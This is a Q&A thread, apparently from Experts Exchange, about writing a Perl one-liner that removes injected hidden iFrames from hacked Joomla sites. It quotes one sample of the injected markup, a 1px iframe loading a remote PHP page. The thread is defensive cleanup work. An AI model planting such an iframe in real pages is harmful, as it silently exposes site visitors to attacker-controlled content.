Solved

Regex Problem Using Perl One-liner

Posted on 2013-05-16
20
452 Views
Last Modified: 2013-05-19
I am trying to help a friend sort out a problem with some web sites that he administers. These are Joomla sites and he has found that the files for each of the sites have been hacked and iFrames have been injected. He wants to remove these dubious iFrames from all the sites and asked if I could provide some code to do this which he could run as a command at SSH.

A search of the web showed that one way of removing these was to use grep and sed but my knowledge of bash is limited and I’m much more knowledgable with Perl so I looked for a Perl solution. The offending code is of the form

<!-- . --><iframe width="1px" height="1px" src= “http://abcd/fghi/appropriate/promise-ourselves.php” style="display:block;" ></iframe>
<!-- . -->
I thought that there might be some other legitimate iFrames on the site so I set about producing some code that would remove the <!-- . --> tags and the iFrames within them and produced the following online Perl code:

perl -pi.bak -e '$pattern="<!-- . -->"; s/$pattern.+?$pattern//gs' `find . -name "*" -type f`
The first problem I came across was that this didn’t find the offending code although I had included the ’s’ option to treat everything as a single line. Although the regex I was using worked perfectly well using the Perl code normally I found that the problem seemed to be due to the fact that the file I had been given to test had CRLF line endings. I used another one liner to change all line endings to LF and tried my code again.

The code now seemed to work all right in removing the offending code. However when I tried it on a file that had two lots of that bad code it didn’t remove both bits despite the ‘g’ option in the regex, and in fact it didn’t remove the first bit properly.

Can someone explain why this code didn’t work with the CRLF line endings, and also why the global version didn’t remove all the bad code. Can I make any change to the one liner so that it works properly?
0
Comment
Question by:RobbieSnr
  • 7
  • 6
  • 6
20 Comments
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39172277
perl -p explicitly loops over each line in the input file.  You need to slurp the file in and manipulate it as a file.  Something like:
perl -i.bak -e '$/ = undef; $f = <>; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f' `find . -name "*" -type f`

Open in new window

0
 

Author Comment

by:RobbieSnr
ID: 39172536
Very quick and simple solution to my problem.
0
 

Author Comment

by:RobbieSnr
ID: 39172555
Many thanks for this quick reply. I used MO=Deparse to find out what was happening and I should have realised that the <> was just bringing in one line at a time and just checking that.

My friend will be very happy when I give him the revised code - he has to remove the offending code from 29 different websites.
0
 
LVL 84

Accepted Solution

by:
ozo earned 300 total points
ID: 39172966
perl -0777 -pi.bak -e '$pattern="<!-- . -->"; s/$pattern.+?$pattern//gs' `find .  -type f`
0
 

Author Comment

by:RobbieSnr
ID: 39173134
I had seen this -0777 parameter used but didn't register just what it did. I see from a Google search that it slurps the whole file into the $_ variable so this is another way to produce the result I wanted, thanks.
0
 

Author Comment

by:RobbieSnr
ID: 39174221
Oh dear, I've been too hasty, neither solution is working as I want it to.

I produced two files, index.html and index2.html. The first one contained that piece of offending iFrame and then I duplicated it, to check that both iFrames would be removed, and this had CRLF endings. The second was identical but with LF endings. I'm attaching both files. I also duplicated the files in subfolders, just to check that the one-liner was working recursively correctly.

I first of all tried to run the code in the main folder by replacing the back ticked 'find' with * so as not to change the sub folders. The version from ozo did remove the iFrames from both files,  with the expected warning about not being able to anything with the folders in that main folder.  However all the line endings were removed, which I didn't want to happen. I then tried the version with the 'find' and it did work recursively all right but with the same problem with the line endings.

I next tried wilcoxon's version, again changing the back ticked 'find' with a *. This removed the iFrames from the index.html file but left the other unchanged, and there was no warning about the folders. As with ozo's version all the line endings had been removed. I then tried the version with the 'find' but it did nothing at all.

Help!
index.html
index2.html
0
 
LVL 84

Expert Comment

by:ozo
ID: 39174261
The only line endings that are removed are the ones between the <!-- . -->  <!-- . -->
along with everything else removed between the  <!-- . -->  <!-- . -->
If, instead of removing everything, you want to replace it with \n or \r\n,
you can do
s/$pattern.+?$pattern/\r\n/gs
0
 
LVL 84

Expert Comment

by:ozo
ID: 39174291
Without the -p there is no loop around the code, so it only slurps one file
0
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175037
Good point.  I forgot about that part.  Hopefully, this version will fix that.
perl -i.bak -e '$/ = undef; while (@ARGV) { $f = <>; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f; shift @ARGV; }' `find . -name "*" -type f`

Open in new window


Otherwise, it gets longer...
perl -i.bak -e '$/ = undef; foreach my $n (@ARGV) { open(IN,$n) or die $!; $f = <IN>; close IN; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f' `find . -name "*" -type f`

Open in new window

0
Free Trending Threat Insights Every Day

Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175043
If the -0777 works for you, it will produce shorter code than my solution (but both should work).  The only problem I can think of with it is if any of the files are any form of unicode (0777 is a valid unicode character so could malfunction).
0
 

Author Comment

by:RobbieSnr
ID: 39175256
Hi ozo, don't know what I was thinking about when I said the line endings were all removed, of course as you say the only ones in the examples were within the code I wanted to remove. You code works as it should, sorry about doubting that!

You mentioned that there was no looping in wilcoxon's original code. I did try just adding the 'p' but that didn't work.

Wilcoxon, thanks for the other two suggestions. I've tried both - the first one for some reason or other just adjusts the second file, index2.html, in all the folders but leaves the first ones untouched. Your second one failed to compile because of a missing bracket, and I couldn't work out where it should be placed.
0
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39175903
The bracket in the second version should go at the end of the perl code section:
perl -i.bak -e '$/ = undef; foreach my $n (@ARGV) { open(IN,$n) or die $!; $f = <IN>; close IN; $pattern = "<!-- . -->"; $f =~ s{$pattern.+?$pattern}{}gs; print $f }' `find . -name "*" -type f`

Open in new window

0
 
LVL 84

Expert Comment

by:ozo
ID: 39176329
-p adds
  while( <> ){
     ...  
  }continue{ print or die "-p destination: $!\n"; }
around your program
so if you use it,  the $f = <>; and print $f are uncalled-for
You should either include the loop in your own code, or use the <> and print from the -p loop
0
 
LVL 26

Assisted Solution

by:wilcoxon
wilcoxon earned 200 total points
ID: 39177788
Based on ozo's comment about what -p adds and some testing, this will work (and is slightly simpler than my previous answer):
perl -i.bak -e '$/ = undef; while (<>) { $pattern = "<!-- . -->"; s{$pattern.+?$pattern}{}gs; print }' `find . -name "*" -type f`

Open in new window


-0777 will work fine in most instances but I'm not a big fan of non-obvious behaviors with hidden gotchas (eg -0777 will choke on (some) unicode files).
0
 
LVL 84

Expert Comment

by:ozo
ID: 39177957
Actually, if you want to use a 777 as a Unicode line separator you'd have to specify it as -0x1FF
0
 
LVL 26

Expert Comment

by:wilcoxon
ID: 39177970
Is that a recent change?  I know you used to be able to specify octal 777 (and hex 0x1FF will have the same potential issue - it's a valid unicode character (though likely uncommon depending on which unicode encoding the file uses)).
0
 
LVL 84

Expert Comment

by:ozo
ID: 39177997
It looks like it's been there since 2003
http://www.nntp.perl.org/group/perl.perl5.changes/2003/04/msg7155.html
If you want to slurp the whole file, you can use -0777, same as pre-Unicode
If you want to separate lines with ¿ (latin small letter o with stroke and acute), you can use -0x1FF
0
 
LVL 84

Expert Comment

by:ozo
ID: 39178004
You should also use
perl -Mopen=:utf8
for Unicode files
0
 

Author Closing Comment

by:RobbieSnr
ID: 39179713
Many thanks to both of you for your help in finding a solution to my problem, and for the interesting information about how these one-liners work.

I was too hasty in taking wilcoxon's initial solution without checking that it provided the solution I required, and then ozo's one worked (despite my thinking initially that there was a problem with missing line endings!). Ozo's one was more concise and worked perfectly with the websites that had to be amended so I have split the points, giving zoo 100 more than wilcoxon for this reason.
0

Featured Post

Threat Intelligence Starter Resources

Integrating threat intelligence can be challenging, and not all companies are ready. These resources can help you build awareness and prepare for defense.

Join & Write a Comment

On Microsoft Windows, if  when you click or type the name of a .pl file, you get an error "is not recognized as an internal or external command, operable program or batch file", then this means you do not have the .pl file extension associated with …
Checking the Alert Log in AWS RDS Oracle can be a pain through their user interface.  I made a script to download the Alert Log, look for errors, and email me the trace files.  In this article I'll describe what I did and share my script.
Learn how to match and substitute tagged data using PHP regular expressions. Demonstrated on Windows 7, but also applies to other operating systems. Demonstrated technique applies to PHP (all versions) and Firefox, but very similar techniques will w…
Explain concepts important to validation of email addresses with regular expressions. Applies to most languages/tools that uses regular expressions. Consider email address RFCs: Look at HTML5 form input element (with type=email) regex pattern: T…

762 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

20 Experts available now in Live!

Get 1:1 Help Now